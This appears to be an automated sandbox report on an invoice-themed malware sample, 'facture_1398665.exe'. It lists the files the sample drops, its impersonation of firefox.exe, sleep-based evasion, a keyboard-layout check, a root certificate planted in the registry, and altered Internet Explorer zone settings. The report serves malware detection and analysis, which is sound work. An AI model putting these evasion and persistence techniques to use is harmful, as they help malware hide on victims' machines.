Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpDropped PE file which has not been started: C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-HRJGD.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpDropped PE file which has not been started: C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-RQQDV.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-handle-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-profile-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpDropped PE file which has not been started: C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-S9A25.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpDropped PE file which has not been started: C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-ENSEN.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpDropped PE file which has not been started: C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-7MF7K.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-libraryloader-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpDropped PE file which has not been started: C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-UPNUP.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpDropped PE file which has not been started: C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-AMM6D.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-interlocked-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-console-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpDropped PE file which has not been started: C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-QG57B.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpDropped PE file which has not been started: C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-BVQS8.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpDropped PE file which has not been started: C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-A8QRP.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpDropped PE file which has not been started: C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-J5TU2.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpDropped PE file which has not been started: C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-8PSLE.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpDropped PE file which has not been started: C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-ARJ01.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-rtlsupport-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpDropped PE file which has not been started: C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-5SLTH.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpDropped PE file which has not been started: C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-LQISF.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpDropped PE file which has not been started: C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-5UL7D.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpDropped PE file which has not been started: C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-6FJQD.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpDropped PE file which has not been started: C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-SJFE0.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpDropped PE file which has not been started: C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-UJ2Q7.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpDropped PE file which has not been started: C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-EOC8V.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-errorhandling-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-sysinfo-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpDropped PE file which has not been started: C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-NGCIJ.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpDropped PE file which has not been started: C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-4DUIV.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpDropped PE file which has not been started: C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-SNF6L.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-crt-private-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpDropped PE file which has not been started: C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-K7B63.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-processenvironment-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpDropped PE file which has not been started: C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-L6BIN.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-namedpipe-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-string-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpDropped PE file which has not been started: C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-CPP49.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpDropped PE file which has not been started: C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-F0F55.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpDropped PE file which has not been started: C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-437NP.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpDropped PE file which has not been started: C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-85NCL.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-crt-process-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpDropped PE file which has not been started: C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-O6IQ7.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-debug-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-util-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-datetime-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-processthreads-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpDropped PE file which has not been started: C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-3H96L.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpDropped PE file which has not been started: C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-NOVNE.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpDropped PE file which has not been started: C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-L7E6Q.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpDropped PE file which has not been started: C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-MQDR2.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpDropped PE file which has not been started: C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-9RVAV.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-file-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\F48A04623C4E0000\msvcr110.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpDropped PE file which has not been started: C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-7JLII.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpDropped PE file which has not been started: C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-56M2D.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-crt-conio-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpDropped PE file which has not been started: C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-599GA.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpDropped PE file which has not been started: C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-VQCNU.tmpJump to dropped file
Found large amount of non-executed APIsShow sources
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exeAPI coverage: 2.6 %
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exeAPI coverage: 2.8 %
May sleep (evasive loops) to hinder dynamic analysisShow sources
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe TID: 1860Thread sleep count: 88 > 30Jump to behavior
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe TID: 4044Thread sleep count: 130 > 30Jump to behavior
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe TID: 4044Thread sleep time: -7800000s >= -60000sJump to behavior
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe TID: 4044Thread sleep time: -60000s >= -60000sJump to behavior
Source: C:\Windows\System32\dllhost.exe TID: 2084Thread sleep time: -180000s >= -60000sJump to behavior
Source: C:\Windows\System32\dllhost.exe TID: 2060Thread sleep time: -1800000s >= -60000sJump to behavior
Source: C:\Windows\System32\dllhost.exe TID: 2344Thread sleep time: -1260000s >= -60000sJump to behavior
Source: C:\Windows\System32\dllhost.exe TID: 2100Thread sleep time: -922337203685477s >= -60000sJump to behavior
Source: C:\Windows\explorer.exe TID: 1444Thread sleep count: 34 > 30
Source: C:\Windows\explorer.exe TID: 1436Thread sleep count: 203 > 30
Source: C:\Windows\explorer.exe TID: 1436Thread sleep time: -12180000s >= -60000s
Source: C:\Windows\explorer.exe TID: 1436Thread sleep time: -60000s >= -60000s
Sample execution stops while process was sleeping (likely an evasion)Show sources
Source: C:\Windows\System32\dllhost.exeLast function: Thread delayed
Uses the keyboard layout for branch decision (may execute only for specific keyboard layouts)Show sources
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exeCode function: 6_2_6EE01230 GetKeyboardLayout followed by cmp: cmp al, 0ch and CTI: je 6EE0128Fh6_2_6EE01230
Contains functionality to enumerate / list files inside a directoryShow sources
Source: C:\Users\user\Desktop\facture_1398665.exeCode function: 2_2_00405BEC GetModuleHandleW,GetProcAddress,lstrcpynW,lstrcpynW,lstrcpynW,FindFirstFileW,FindClose,lstrlenW,lstrcpynW,lstrlenW,lstrcpynW,2_2_00405BEC
Source: C:\Users\user\Desktop\facture_1398665.exeCode function: 2_1_00405BEC GetModuleHandleW,GetProcAddress,lstrcpynW,lstrcpynW,lstrcpynW,FindFirstFileW,FindClose,lstrlenW,lstrcpynW,lstrlenW,lstrcpynW,2_1_00405BEC
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpCode function: 3_2_00408174 GetModuleHandleW,GetProcAddress,lstrcpynW,lstrcpynW,lstrcpynW,FindFirstFileW,FindClose,lstrlenW,lstrcpynW,lstrlenW,lstrcpynW,3_2_00408174
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpCode function: 3_2_004D4F34 FindFirstFileW,FindNextFileW,FindClose,3_2_004D4F34
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpCode function: 3_2_004AD294 FindFirstFileW,GetLastError,3_2_004AD294
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpCode function: 3_2_004FDF38 FindFirstFileW,SetFileAttributesW,DeleteFileW,FindNextFileW,FindClose,3_2_004FDF38
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpCode function: 3_2_004C0BC0 SetErrorMode,FindFirstFileW,FindNextFileW,FindClose,SetErrorMode,3_2_004C0BC0
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpCode function: 3_2_004BF43C FindFirstFileW,FindNextFileW,FindClose,3_2_004BF43C
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpCode function: 3_2_004C107C SetErrorMode,FindFirstFileW,FindNextFileW,FindClose,SetErrorMode,3_2_004C107C
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpCode function: 3_1_00408174 GetModuleHandleW,GetProcAddress,lstrcpynW,lstrcpynW,lstrcpynW,FindFirstFileW,FindClose,lstrlenW,lstrcpynW,lstrlenW,lstrcpynW,3_1_00408174
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpCode function: 3_1_004D4F34 FindFirstFileW,FindNextFileW,FindClose,3_1_004D4F34
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpCode function: 3_1_004AD294 FindFirstFileW,GetLastError,3_1_004AD294
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exeCode function: 4_2_6E0FF154 _errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,wcscpy_s,_invoke_watson,4_2_6E0FF154
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exeCode function: 4_2_6E0FF033 _errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,wcscpy_s,_invoke_watson,4_2_6E0FF033
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exeCode function: 4_2_6E0FF27E _errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,wcscpy_s,_invoke_watson,4_2_6E0FF27E
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exeCode function: 4_2_6E0FEF1D _errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,wcscpy_s,_invoke_watson,4_2_6E0FEF1D
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exeCode function: 4_2_6E109748 _mbsdec_l,memset,FindFirstFileExA,FindClose,FindNextFileA,qsort,4_2_6E109748
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exeCode function: 4_2_6E1098CF memset,FindFirstFileExW,FindClose,FindNextFileW,qsort,4_2_6E1098CF
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exeCode function: 5_2_697C98CF memset,FindFirstFileExW,FindClose,FindNextFileW,qsort,5_2_697C98CF
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exeCode function: 5_2_697BEF1D _errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,wcscpy_s,_invoke_watson,5_2_697BEF1D
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exeCode function: 5_2_697C9748 _mbsdec_l,memset,FindFirstFileExA,FindClose,FindNextFileA,qsort,5_2_697C9748
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exeCode function: 5_2_697BF27E _errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,wcscpy_s,_invoke_watson,5_2_697BF27E
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exeCode function: 6_2_00383836 SHGetFolderPathA,lstrcat,FindFirstFileA,lstrcmp,lstrcmp,lstrcpy,lstrlen,lstrcat,lstrcat,SHFileOperation,FindNextFileA,SHGetFolderPathA,lstrcat,FindFirstFileA,lstrcmp,lstrcmp,lstrcpy,lstrlen,lstrcat,lstrcpy,lstrcat,DeleteFileA,lstrcpy,lstrcat,CreateFileA,GetFileSize,ReadFile,lstrcat,lstrcat,StrStrA,lstrlen,WriteFile,lstrlen,WriteFile,??3@YAXPAX@Z,CloseHandle,FindNextFileA,6_2_00383836
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exeCode function: 6_2_0038364C SHGetFolderPathA,lstrcat,FindFirstFileA,lstrcmp,lstrcmp,lstrcpy,lstrlen,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrcat,SHFileOperation,DeleteFileA,FindNextFileA,6_2_0038364C
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exeCode function: 6_2_00382F10 lstrcpy,lstrcat,CreateDirectoryA,GetLastError,FindFirstFileA,lstrcpy,lstrcat,lstrcat,lstrcpy,lstrcat,lstrcat,lstrcmp,lstrcmp,CreateDirectoryA,GetLastError,CopyFileA,FindNextFileA,6_2_00382F10
Contains functionality to query system informationShow sources
Source: C:\Users\user\Desktop\facture_1398665.exeCode function: 2_2_0040ED40 GetSystemInfo,VirtualQuery,VirtualProtect,VirtualProtect,VirtualQuery,2_2_0040ED40
Program exit pointsShow sources
Source: C:\Users\user\Desktop\facture_1398665.exeAPI call chain: ExitProcess graph end nodegraph_2-7768
Queries a list of all running processesShow sources
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpProcess information queried: ProcessInformationJump to behavior

Hooking and other Techniques for Hiding and Protection:

barindex
Contains functionality to check if a window is minimized (may be used to check if an application is visible)Show sources
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpCode function: 3_2_00470AAC GetWindowLongW,IsIconic,IsWindowVisible,ShowWindow,SetWindowLongW,SetWindowLongW,ShowWindow,ShowWindow,3_2_00470AAC
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpCode function: 3_2_0046335C IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement,3_2_0046335C
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpCode function: 3_2_004736F8 IsIconic,SetFocus,GetParent,SaveDC,RestoreDC,GetWindowDC,SaveDC,RestoreDC,3_2_004736F8
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpCode function: 3_2_004629EC IsIconic,GetCapture,3_2_004629EC
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpCode function: 3_2_00470A2C IsIconic,3_2_00470A2C
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpCode function: 3_2_00481238 IsIconic,GetWindowLongW,GetWindowLongW,GetActiveWindow,MessageBoxW,SetActiveWindow,3_2_00481238
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpCode function: 3_2_00463DC8 IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongW,GetWindowLongW,GetWindowLongW,ScreenToClient,ScreenToClient,3_2_00463DC8
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpCode function: 3_2_0042DBCC MonitorFromWindow,MonitorFromWindow,IsIconic,GetWindowPlacement,GetWindowRect,3_2_0042DBCC
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpCode function: 3_2_004E6860 IsIconic,GetWindowLongW,ShowWindow,ShowWindow,3_2_004E6860
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpCode function: 3_1_00470AAC GetWindowLongW,IsIconic,IsWindowVisible,ShowWindow,SetWindowLongW,SetWindowLongW,ShowWindow,ShowWindow,3_1_00470AAC
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpCode function: 3_1_0046335C IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement,3_1_0046335C
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpCode function: 3_1_004736F8 IsIconic,SetFocus,GetParent,SaveDC,RestoreDC,GetWindowDC,SaveDC,RestoreDC,3_1_004736F8
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpCode function: 3_1_004629EC IsIconic,GetCapture,3_1_004629EC
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpCode function: 3_1_00470A2C IsIconic,3_1_00470A2C
Extensive use of GetProcAddress (often used to hide API calls)Show sources
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exeCode function: 6_2_0037F213 LoadLibraryA,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetPr6_2_0037F213
Monitors certain registry keys / values for changes (often done to protect autostart functionality)Show sources
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOTJump to behavior
Stores large binary data to the registryShow sources
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
Disables application error messsages (SetErrorMode)Show sources
Source: C:\Users\user\Desktop\facture_1398665.exeProcess information set: FAILCRITICALERRORS and NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\facture_1398665.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\facture_1398665.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\facture_1398665.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpProcess information set: FAILCRITICALERRORS and NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpProcess information set: FAILCRITICALERRORS and NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpProcess information set: FAILCRITICALERRORS and NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpProcess information set: FAILCRITICALERRORS and NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpProcess information set: FAILCRITICALERRORS and NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpProcess information set: FAILCRITICALERRORS and NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpProcess information set: FAILCRITICALERRORS and NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpProcess information set: FAILCRITICALERRORS and NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpProcess information set: FAILCRITICALERRORS and NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX

Lowering of HIPS / PFW / Operating System Security Settings:

barindex
Modifies Internet Explorer zone settingsShow sources
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exeRegistry key created or modified: HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3 2500Jump to behavior

Language, Device and Operating System Detection:

barindex
Contains functionality locales information (e.g. system language)Show sources
